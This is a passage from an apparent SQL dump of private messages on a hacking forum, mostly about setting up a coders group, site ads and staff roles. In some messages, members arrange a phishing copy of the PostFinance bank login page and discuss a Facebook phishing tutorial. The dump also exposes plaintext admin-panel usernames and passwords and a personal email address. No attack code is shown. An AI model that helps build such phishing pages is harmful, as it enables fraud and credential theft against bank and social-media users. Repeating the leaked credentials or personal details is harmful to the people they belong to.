'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Re: phishing', '0', '[quote=\'sirchamp\'] can you make a copy of this website ? https://www.postfinance.ch/ my email : phonomarco@yahoo.de thanks alot [/quote] Which of these 2 you would like to have as login/phising page: Login E-Finance Login E-Trading', '1345113368', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('141', '53', '64', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'Re: phishing', '0', '[quote=\'vlajke\'] [quote=\'sirchamp\'] can you make a copy of this website ? https://www.postfinance.ch/ my email : phonomarco@yahoo.de thanks alot [/quote] Which of these 2 you would like to have as login/phising page: Login E-Finance Login E-Trading [/quote] Login E-Finance please. Thanks a bunch', '1345113462', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('144', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Coders group', '0', 'I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. ', '1345133374', '0', '3', '1345135007', '1', '0', '0', '1345133744'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('146', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png', '1345135007', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('147', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? ', '1345141272', '0', '3', '1345147112', '1', '0', '0', '1345147064'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('149', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings?', '1345147112', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('153', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add?', '1345149186', '0', '3', '1345149811', '1', '0', '0', '1345149552'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('155', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon', '1345149811', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('156', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. ', '1345150007', '0', '3', '1345155106', '1', '0', '0', '1345155041'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('161', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. [/quote] haha, thanks :)', '1345155106', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('162', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. [/quote] haha, thanks :) [/quote] No problem. Tomorrow, I will add a groups forum so people can apply. ', '1345156584', '0', '3', '1345163653', '1', '0', '0', '1345162899'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('164', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. [/quote] haha, thanks :) [/quote] No problem. Tomorrow, I will add a groups forum so people can apply. [/quote] kk :D', '1345163653', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('176', '53', '54', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: Question', '0', '[quote=\'Sin Cara\'] [quote=\'sirchamp\'] Hey Sin Cara Im not sure if im allowed to make a tutorial for a facebook phishing page. So i wanna ask if i am allowed to do that tutorial. Im asking this because it said somewhere no blackhat activities ... Thx and regards [/quote] no.. you can\'t. [/quote] i already asked the joker he said its alright', '1345193782', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('178', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. [/quote] haha, thanks :) [/quote] No problem. Tomorrow, I will add a groups forum so people can apply. [/quote] kk :D [/quote] BTW, is the current group description OK or would you like it to be changed? ', '1345209186', '0', '3', '1345217328', '1', '0', '0', '1345217216'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('183', '53', '54', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Re: Question', '0', '[quote=\'Sin Cara\'] [quote=\'sirchamp\'] [quote=\'Sin Cara\'] [quote=\'sirchamp\'] Hey Sin Cara Im not sure if im allowed to make a tutorial for a facebook phishing page. So i wanna ask if i am allowed to do that tutorial. Im asking this because it said somewhere no blackhat activities ... Thx and regards [/quote] no.. you can\'t. [/quote] i already asked the joker he said its alright [/quote] then sorry for the inconvenience... i m new here :) [/quote] xD no problem. Im also new here^^', '1345216955', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('187', '67', '1', '67', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Coders group', '0', '[quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. [/quote] haha, thanks :) [/quote] No problem. Tomorrow, I will add a groups forum so people can apply. [/quote] kk :D [/quote] BTW, is the current group description OK or would you like it to be changed? [/quote] Its nice :)', '1345217328', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('188', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '5', 'Re: Coders group', '0', '[quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] [quote=\'HoverCatz\'] [quote=\'t3h jok3r\'] I\'ll be making the coders group for you. I would like to know what icon you would like on my userbar or you can create your own userbar from the tutorial below. http://l33thacking.com/showthread.php?tid=2 Also, we don\'t have any Coding forums at the moment, but if you would like we can add some sections for you. Just provide us with the sections that you think should be added on coding. [/quote] Can you use this direct link incase i want to edit it? https://dl.dropbox.com/u/33062220/Coders.png [/quote] Sure, I can but just to let you know. If I don\'t upload it to the site, just use that link then during slow connections or ddos etc that userbar won\'t load properly. So do you still want me to use that link or want me to upload it to the site? [/quote] Hmm, am i able to Change the group image link in the group settings? [/quote] Lol at the moment, I\'m not sure myself but I believe you can. Let me create the group now but if you can then you can change it anytime. Also what forums should I add? [/quote] hmm k. [General][Hacking][Coding][Computing][Upgraded][Graphics][Marketplace] Under Coding: [Forum] (icon1)VB.Net (icon2)Java icon1: http://www.iconfinder.com/icondetails/35560/128/build_code_hammer_options_screwdriver_settings_tools_icon icon2: http://www.iconfinder.com/icondetails/7093/128/eclipse_java_icon [/quote] Wow, I didn\'t expect so much information. Anyway, thanks. I have added the group. You can view it at http://l33thacking.com/usercp.php?action=usergroups You are the only leader and you can pick who is allowed to join and who is not. You can also kick or add new members. That\'s all, those are the options that were provided so I checked all two. Your sections (Forums) will be up in a few minutes. [/quote] haha, thanks :) [/quote] No problem. Tomorrow, I will add a groups forum so people can apply. [/quote] kk :D [/quote] BTW, is the current group description OK or would you like it to be changed? [/quote] Its nice :) [/quote] Thanks. ', '1345217449', '0', '1', '0', '1', '0', '0', '1345219288'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('190', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Money', '0', '[quote=\'t3h jok3r\'] Yo, sorry man. I\'m waiting for my dad to add some funds tomorrow on my PayPal because I need around $40 so my dad told me that he will add the funds, all in one go tomorrow. So tomorrow I\'ll give you your money as well. By the way, I\'m going to be using adbrite for ads on my website. I wanted to know if I should have inline ads? Inline= Ads between posts [/quote] No inline adds I hate those. :P and the money thing is not a rush man It is not like some guy is holding me hostage for a ransom. xD lol Ps please stop saying my website I know it is yours but call it like the site or something . :)', '1345220662', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('195', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Money', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Yo, sorry man. I\'m waiting for my dad to add some funds tomorrow on my PayPal because I need around $40 so my dad told me that he will add the funds, all in one go tomorrow. So tomorrow I\'ll give you your money as well. By the way, I\'m going to be using adbrite for ads on my website. I wanted to know if I should have inline ads? Inline= Ads between posts [/quote] No inline adds I hate those. :P and the money thing is not a rush man It is not like some guy is holding me hostage for a ransom. xD lol Ps please stop saying my website I know it is yours but call it like the site or something . :) [/quote] Dude, I just realized it that I kept on saying my website lol. My bad also I bought ads spot on 2 sites and buying more today. Investing all my money left into ads and members and I also get 100 free backlinks from a website found on Google. I hope this site gets popular soon. BTW I need to make your a account to access ACP, give me a username(diff from LH) and a password. [/quote] Good I hope we get people! :) I thought I already had a admin cp account? User:tehjokerlovespenis Pass:iamasexyadmin12 ', '1345226476', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('197', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Astro PID', '0', '[quote=\'t3h jok3r\'] Thanks for the contribution. I have moved your thread to the PIDs forum, I\'m sending this message so you know where the thread is and don\'t think it got junked. Thanks once again for contributing. Have a great day. [/quote] Thanks man, Hope everyone enjoys it :)', '1345229859', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('199', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Astro PID', '0', 'By the way. Id love to take on a job for these forums since Iv been looking for something new, I\'m not looking for profits or anything like that. I just want to help you guys make this work. I can help out or maybe take on a higher position, Keep it in mind if you ever need someone. like I said I\'m not interested in taking any of your profits id just love to help out more tis all.', '1345231530', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('204', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Money', '0', 'User:poopipie Pass:sosecret32 [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Yo, sorry man. I\'m waiting for my dad to add some funds tomorrow on my PayPal because I need around $40 so my dad told me that he will add the funds, all in one go tomorrow. So tomorrow I\'ll give you your money as well. By the way, I\'m going to be using adbrite for ads on my website. I wanted to know if I should have inline ads? Inline= Ads between posts [/quote] No inline adds I hate those. :P and the money thing is not a rush man It is not like some guy is holding me hostage for a ransom. xD lol Ps please stop saying my website I know it is yours but call it like the site or something . :) [/quote] Dude, I just realized it that I kept on saying my website lol. My bad also I bought ads spot on 2 sites and buying more today. Investing all my money left into ads and members and I also get 100 free backlinks from a website found on Google. I hope this site gets popular soon. BTW I need to make your a account to access ACP, give me a username(diff from LH) and a password. [/quote] Good I hope we get people! :) I thought I already had a admin cp account? User:tehjokerlovespenis Pass:iamasexyadmin12 [/quote] You do. But when you go on the admincp, it asks for a bypass because I have password protected the admin directory. After you bypass the password protected directory then you will be taken to the admin login page. Then you enter your FORUM USERNAME and PASSWORD including the secret pin. Come on, give a a proper username and pass mayne. [/quote]', '1345241308', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('207', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Astro PID', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] By the way. Id love to take on a job for these forums since Iv been looking for something new, I\'m not looking for profits or anything like that. I just want to help you guys make this work. I can help out or maybe take on a higher position, Keep it in mind if you ever need someone. like I said I\'m not interested in taking any of your profits id just love to help out more tis all. [/quote] Thanks, I was really thinking of keeping one more staff member or admin but I was hoping if they could refer some HQ members. [/quote] Or if you\'d like to make a gaming section Id love to manage that. But yeah I guess just keep it in mind, Id love to help out.', '1345242730', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('213', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help Needed', '0', '[quote=\'t3h jok3r\'] OK, it\'s awkward that an Admin is asking their members for help but you asked if you can get promoted and you could help us out. I was wondering if you can help me out with a small task, if it works out then you would get a chance. [/quote] sure, with what?', 